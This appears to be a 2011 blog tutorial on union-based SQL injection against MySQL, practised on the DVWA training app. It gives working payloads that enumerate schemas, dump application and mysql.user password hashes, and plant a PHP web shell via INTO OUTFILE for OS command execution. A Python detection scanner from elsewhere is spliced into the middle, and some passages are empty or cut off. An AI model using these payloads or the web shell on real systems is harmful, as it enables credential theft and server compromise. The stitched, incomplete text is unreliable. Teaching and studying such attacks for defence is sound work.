Tuesday, October 18, 2011

Basic SQL Injection on MYSQL part 2

In this post we will continue to enumerate the database through the use of the Union statement. We will use the union statement to poison the results being given back to us because we cannot use stacked queries in a MySQL/PHP environment. A stacked query is simply closing off the first query and creating our own from scratch and appending it to the original one. In our case it would look something like this:

'; Select user from mysql.user;#

As you can see we would end the original query with the semi-colon and would then be able to redirect the query to basically anything we wanted. But as I said we are not able to do that in this scenario.

The first step would be to determine how many columns we must put in our query to make the database happy. Since we have already done that in the previous post, we know that the original query has two columns. Therefore all of our enumeration must be done with only two columns per query. Let's start by trying to dump the database schema piece by piece. We can do this by querying the information_schema database. Our query would look like this:

' union all select table_schema,table_name from information_schema.tables;#

Awesome. We are able to see the schema names (the database names) as well as each table name. When enumerating a database we want to drill down into the rows in this order:


Now that we have the databases and tables, let's clean our results up a little bit and also get specific columns from interesting tables.

' union all select concat(table_schema, ':', table_name), column_name from information_schema.columns where column_name like '%pass%';#

Now then, that is much cleaner. What the previous injection does is ask for the database name and table name concatenated together as the first column, then the column name as the second column, for any column whose name includes the letters 'pass'. We do this with the SQL LIKE operator. Remember, once SQL injection is confirmed, you are usually only limited by your knowledge of the SQL language. You are able to use any SQL command since you are talking straight to the database. As you can see we have pulled 3 columns all named password: one in the dvwa database and the other two in the mysql database. Let's go ahead and explore the dvwa database and see if we can't extract the users and passwords for the application we are using.

' union all select user, password from users;#

The results are truly a beautiful thing to behold. A list of usernames and hashed passwords, also known as the jackpot. All we would need to do at this point is point our trusty John the Ripper password cracker at these MD5 hashes and wait for the results to have full admin access to this web application. That is fine and dandy, but I am a greedy bad guy and I want to see if I can compromise the MySQL database as well as the underlying operating system. Let's go after the MySQL database first.

' union all select user, password from mysql.user;#

Bingo. Not only did we get the root account hash, we also got a hash for a "pma" user. This is most likely the phpMyAdmin account in the database.

On to the OS. For attacking the underlying operating system, we will use a very simple PHP shell to give us the ability to run commands on the OS.

' union select "<? system($_REQUEST['cmd']); ?>",2 into outfile "/opt/lampp/htdoc/temp/badguy.php" ;#

This command requires that we have write access to a directory that is publicly served by the web server. In this case we are writing a file called badguy.php into the directory temp. The file contains a single PHP statement, so that we are able to pass commands through the browser to the underlying operating system.
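As an added defender-side example (not code from the original post), here is a small Python scanner that URL-decodes the request in constructed Apache-style access log lines and flags the union-based enumeration and INTO OUTFILE patterns walked through above; the sample log lines, rule names and severity levels are my own assumptions.

```python
import re
from urllib.parse import unquote_plus

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/[\d.]+"')

# Signatures for the union-based steps in this post, matched on the decoded query string.
RULES = [
    ("union_select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
    ("mysql_user_table", re.compile(r"\bmysql\.user\b", re.I)),
    ("into_outfile", re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
    ("quote_then_comment", re.compile(r"['\"].*(?:#|--\s|/\*)\s*$", re.I)),
]

# Constructed sample traffic in Apache combined-log style; not real log data.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Oct/2011:10:01:02 -0400] "GET /dvwa/vulnerabilities/sqli/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [18/Oct/2011:10:01:09 -0400] "GET /dvwa/vulnerabilities/sqli/?id=%27+union+all+select+table_schema%2Ctable_name+from+information_schema.tables%3B%23 HTTP/1.1" 200 8123
10.0.0.5 - - [18/Oct/2011:10:02:41 -0400] "GET /dvwa/vulnerabilities/sqli/?id=%27+union+select+%22x%22%2C2+into+outfile+%22%2Ftmp%2Fx.php%22%3B%23 HTTP/1.1" 200 0
10.0.0.7 - - [18/Oct/2011:10:03:00 -0400] "GET /search?q=union+station HTTP/1.1" 200 300
"""

def decoded_query(log_line):
    """Return the URL-decoded query string of one log line ('' if none)."""
    m = REQUEST_RE.search(log_line)
    if not m or "?" not in m.group(1):
        return ""
    return unquote_plus(m.group(1).split("?", 1)[1])

def classify(query):
    """Return (matched rule names, severity) for a decoded query string."""
    hits = [name for name, rx in RULES if rx.search(query)]
    if "into_outfile" in hits:
        severity = "critical"   # file write through the DB server: possible web shell drop
    elif "union_select" in hits and {"information_schema", "mysql_user_table"} & set(hits):
        severity = "high"       # schema or credential enumeration
    elif "union_select" in hits:
        severity = "medium"
    else:
        severity = "none"
    return hits, severity

def scan_log(text):
    """Return [(line number, severity, hits)] for lines that trip a rule."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        hits, severity = classify(decoded_query(line))
        if severity != "none":
            findings.append((n, severity, hits))
    return findings
```

Note that the plain-English request for "union station" is not flagged, because the union rule requires a following SELECT; a real deployment would also decode repeated encodings and inspect POST bodies.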

Now we need to enter into our browser the following: -a

Awesome! We are able to issue operating system commands, and we can see that this is a Debian server as well as what kernel version it runs. At this point we would try to figure out a way to escalate privileges. G0tmi1k has a great compilation of commands to help map out an unknown OS.


For a really great presentation on union poisoning go here: Understanding MySQL poisoning

That is all for this post. I hope you are able to see just how much damage a SQL injection attack can allow.

